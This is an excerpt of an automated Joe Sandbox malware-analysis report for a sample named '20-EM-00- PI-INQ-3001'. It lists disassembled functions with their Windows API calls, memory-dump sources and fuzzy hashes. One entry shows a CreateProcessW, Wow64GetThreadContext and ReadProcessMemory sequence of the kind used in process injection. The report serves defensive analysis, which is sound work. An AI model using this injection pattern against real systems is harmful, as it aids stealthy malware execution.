                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 6740c19424ad1a37d1e510644c69b04a79e8c94fc3ec92f8705ee7c8fdd8006d
                                          • Instruction ID: 509d229c25660b8e58e4cb1948c0c55e8934f978b00feacf3ce560fb28fce120
                                          • Opcode Fuzzy Hash: 6740c19424ad1a37d1e510644c69b04a79e8c94fc3ec92f8705ee7c8fdd8006d
                                          • Instruction Fuzzy Hash: 2AE0C2B130C7004ACE20A538BE04AC317EF0F4C316B082C0DBA0AFB142CE20E8928034
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 9f2ca5d56ae2277957ceeb2579e0a41e86956d5e93db9d9b3b4686c3a13f5971
                                          • Instruction ID: b66b380e389d28f0dbb328a7d9c629042cb26995cc38866a0b679443fc19362f
                                          • Opcode Fuzzy Hash: 9f2ca5d56ae2277957ceeb2579e0a41e86956d5e93db9d9b3b4686c3a13f5971
                                          • Instruction Fuzzy Hash: 0C226A70508345CFC724DF18C494B6ABBE1BF84304F1AC95DE99A9B262D731EC85CB92
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00DF4992
                                            • Part of subcall function 00E135AC: __lock.LIBCMT ref: 00E135B2
                                            • Part of subcall function 00E135AC: DecodePointer.KERNEL32(00000001,?,00DF49A7,00E481BC), ref: 00E135BE
                                            • Part of subcall function 00E135AC: EncodePointer.KERNEL32(?,?,00DF49A7,00E481BC), ref: 00E135C9
                                            • Part of subcall function 00DF4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DF4A73
                                            • Part of subcall function 00DF4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DF4A88
                                            • Part of subcall function 00DF3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DF3B7A
                                            • Part of subcall function 00DF3B4C: IsDebuggerPresent.KERNEL32 ref: 00DF3B8C
                                            • Part of subcall function 00DF3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EB62F8,00EB62E0,?,?), ref: 00DF3BFD
                                            • Part of subcall function 00DF3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DF3C81
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DF49D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 9bbbd4664a03a11bfe0f02dffd85d514485e348e809f6309c4a083bd9b396762
                                          • Instruction ID: 4c1039da880407effb525c61738722b9e94414c8d572ae8d587ae985b51d24a8
                                          • Opcode Fuzzy Hash: 9bbbd4664a03a11bfe0f02dffd85d514485e348e809f6309c4a083bd9b396762
                                          • Instruction Fuzzy Hash: D011C0719183059FC700DF2ADC0592BFBE8EF84710F00861EF594A72B1DB708958CBA1
                                          APIs
                                            • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          • std::exception::exception.LIBCMT ref: 00E1102C
                                          • __CxxThrowException@8.LIBCMT ref: 00E11041
                                            • Part of subcall function 00E187DB: RaiseException.KERNEL32(?,?,?,00EABAF8,00000000,?,?,?,?,00E11046,?,00EABAF8,?,00000001), ref: 00E18830
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: de73dfc1905ce451a1b144f40e0da548de5e03926f6f23e1f7308c521dc181f2
                                          • Instruction ID: b106f030bd7d464a0630931428ed808a418722cc92478c3f98180425d903fa1e
                                          • Opcode Fuzzy Hash: de73dfc1905ce451a1b144f40e0da548de5e03926f6f23e1f7308c521dc181f2
                                          • Instruction Fuzzy Hash: D1F0283590034DA6CB20BA68ED029EF7BEC9F04350F10206AFA08B61C1DFB18AC0D2D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: b11b94a8843a3dd9608d0f3aed2b54e237624318d40f54051231b766022cc90c
                                          • Instruction ID: 842916ac6b97ee5bfa73c1890bc4f92a45f6447ca8cbd7f4006daa1269250178
                                          • Opcode Fuzzy Hash: b11b94a8843a3dd9608d0f3aed2b54e237624318d40f54051231b766022cc90c
                                          • Instruction Fuzzy Hash: E8018872800608EBCF11AF698D029DE7BA1AF85360F145225B8247A161DB318A91DB91
                                          APIs
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • __lock_file.LIBCMT ref: 00E1561B
                                            • Part of subcall function 00E16E4E: __lock.LIBCMT ref: 00E16E71
                                          • __fclose_nolock.LIBCMT ref: 00E15626
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 03bf23a8e9ba9c4b97a59d37a3a627d5cc56137399897e47a3370a5b491fb7f9
                                          • Instruction ID: c4eef39930d0e9dfcf184cae60b1b532fceadcbd7baf9d82afd64225156f3a0f
                                          • Opcode Fuzzy Hash: 03bf23a8e9ba9c4b97a59d37a3a627d5cc56137399897e47a3370a5b491fb7f9
                                          • Instruction Fuzzy Hash: 59F0B473904B04DAD720AF758902BEE77E16F81334F65A209A425BB1C1CFBC8EC19B95
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00FF1A5B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FF1AF1
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FF1B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                          • Instruction ID: 81838b00316419788e5a6d6db678a80fcab6092df92bce150c3a3d8ff3d812f6
                                          • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                          • Instruction Fuzzy Hash: FF12BE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 198996caa749317a40f2aaf138a6a25b3074b9ab961d9cac8b3a682a9b5c0457
                                          • Instruction ID: b024d84035a7e25e238387c1b0ec2b928723cd499e6804ea48820ede71efc696
                                          • Opcode Fuzzy Hash: 198996caa749317a40f2aaf138a6a25b3074b9ab961d9cac8b3a682a9b5c0457
                                          • Instruction Fuzzy Hash: C561A0B0A0020A9FCB10DF64C891ABBB7F5EF48304F19C479EA4697281D770ED51CB61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: e675f1f84c84f6c4a193459ae399155395b26a755fcb90e5474fa7fb1c4cb3d4
                                          • Instruction ID: ce3054e8b10308f946a72eca3558061f2229176b03d2f3c43b8996dd74113bb4
                                          • Opcode Fuzzy Hash: e675f1f84c84f6c4a193459ae399155395b26a755fcb90e5474fa7fb1c4cb3d4
                                          • Instruction Fuzzy Hash: 8531C435A4C524CFCF10AF44E8907A9BBB1FF88360F51D089E996AB346C771A945CBA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 597e2a752ea8137e960bb4c04dfc9f8fa83a9f2d6eb4d28bd5ff3a0d9891bda9
                                          • Instruction ID: 51f96e0031db8384ff1fea3ae721a336ecfac966437eb63a86c39244465cde68
                                          • Opcode Fuzzy Hash: 597e2a752ea8137e960bb4c04dfc9f8fa83a9f2d6eb4d28bd5ff3a0d9891bda9
                                          • Instruction Fuzzy Hash: 7F410BB4504355CFDB14DF18C494B2ABBE0BF45318F1A889CE9999B362D335EC85CB52
                                          APIs
                                            • Part of subcall function 00DF4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DF4D4D
                                            • Part of subcall function 00E1548B: __wfsopen.LIBCMT ref: 00E15496
                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4F6F
                                            • Part of subcall function 00DF4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DF4D02
                                            • Part of subcall function 00DF4DD0: _memmove.LIBCMT ref: 00DF4E1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: e475883cd41d990f42a018c351ad41877705e6af60e22e4cf0dc3296cd2a8af5
                                          • Instruction ID: bb90b683eaab5bc58151f2f652e84c3d8c7f278b6fb17b853fb475155d5d0578
                                          • Opcode Fuzzy Hash: e475883cd41d990f42a018c351ad41877705e6af60e22e4cf0dc3296cd2a8af5
                                          • Instruction Fuzzy Hash: 5011C43160060DAACB10AF70DC02BBE77A4DF80711F12C429FB45AA1C2DA759A059770
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: b9165f7defcb3e4ed60c2484ce900cc8ab1e78941965e884db1fdd2c3fe745bb
                                          • Instruction ID: 45c80488996f329669f983e0bc051bd6ab9f5e9f375236d4c2318d2fecb01109
                                          • Opcode Fuzzy Hash: b9165f7defcb3e4ed60c2484ce900cc8ab1e78941965e884db1fdd2c3fe745bb
                                          • Instruction Fuzzy Hash: 0C2127B4A08345CFCB14DF14C444B6ABBE0BF88314F0A896CFA9957761D731E849CB62
                                          APIs
                                            • Part of subcall function 00E47652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                            • Part of subcall function 00E47652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
                                            • Part of subcall function 00E47652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                            • Part of subcall function 00E47652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • IIDFromString.OLE32(00000000,?,?,?,00E4DAA9,?,?,?,?,?,?,?,?,?), ref: 00E4DC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 275098861bd76ce9865130c962833d83b90306b65e15e858016002f3d00542c7
                                          • Instruction ID: 8cf2f79b5f4b03fc1c5e73e455d05b6d06631dcceffbc2b6bc6839e7b1de2c42
                                          • Opcode Fuzzy Hash: 275098861bd76ce9865130c962833d83b90306b65e15e858016002f3d00542c7
                                          • Instruction Fuzzy Hash: F2F01D75248606DBDB04DF05ECC0AA6BB99FB45364B10A165ED08EE155C3F1E944DBA0
                                          APIs
                                          • __lock_file.LIBCMT ref: 00E14AD6
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 31ee6291cec7207983bf84a20f9456515edb7eafa0a3f9045c52992c60228c59
                                          • Instruction ID: a9f498edb154b0e2f576206ea4dde35fbb2d5fed5fa3496047f23d85be621383
                                          • Opcode Fuzzy Hash: 31ee6291cec7207983bf84a20f9456515edb7eafa0a3f9045c52992c60228c59
                                          • Instruction Fuzzy Hash: FFF0FFB1900209ABDF61AF748C02BDE36E0AF00329F05A104B424BA2D1DB788AD1CF90
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4FDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: e79da77b1098235df27e7be5d48bb22067a5c96c65eda99d04268afc004d4efc
                                          • Instruction ID: 1ede81944563e27a52d1c195b93bffa6317663934f3a03ac763ad3ef3796a517
                                          • Opcode Fuzzy Hash: e79da77b1098235df27e7be5d48bb22067a5c96c65eda99d04268afc004d4efc
                                          • Instruction Fuzzy Hash: 77F01571105716CFCB349F64E494823BBF1BF04329326CA3EE2DA82A10C731A884DB60
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E109F4
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 4ab42de76f67a45f9a8bcea1aff8687cbbbb45a6e7cdbc784483df10a4fa3847
                                          • Instruction ID: 3ef53e9b056d84c6ff7a32073dc5b7edb3b218fc0ab28c53d64f181b1476d6cf
                                          • Opcode Fuzzy Hash: 4ab42de76f67a45f9a8bcea1aff8687cbbbb45a6e7cdbc784483df10a4fa3847
                                          • Instruction Fuzzy Hash: 18E0CD3690422C9BC720D658AC05FFA77EDDF88790F0541F5FD0CD7215D9609D8186A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction ID: bb1a5d64805a660fe503eb86dfe6b7bb412761a21770fcef9bcc73db0cde6cf2
                                          • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction Fuzzy Hash: 07E092B1104B409FD7388A24D8507E373E0AB06319F00081CF69A93342EB6278458B59
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: b42fac6b638b4e8f4446c8f423b4292d2fd01938fb53ed1c1fa23f053d2368cf
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: C8B0927684020CB7DE012E82EC02A993B599B80678F808020FB1D28162A673A6A09689
                                          APIs
                                          • GetTempPathW.KERNELBASE(00000104,?), ref: 00E3221A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PathTemp
                                          • String ID:
                                          • API String ID: 2920410445-0
                                          • Opcode ID: 5c21af349769ba64d16079ec47d2319b28b4e52abce5bacbe9940f4081d17de8
                                          • Instruction ID: 6cfd8c8d1a44042d696cfc170079f443a0e512df4f7dba6a4b3d24ed4b7d1469
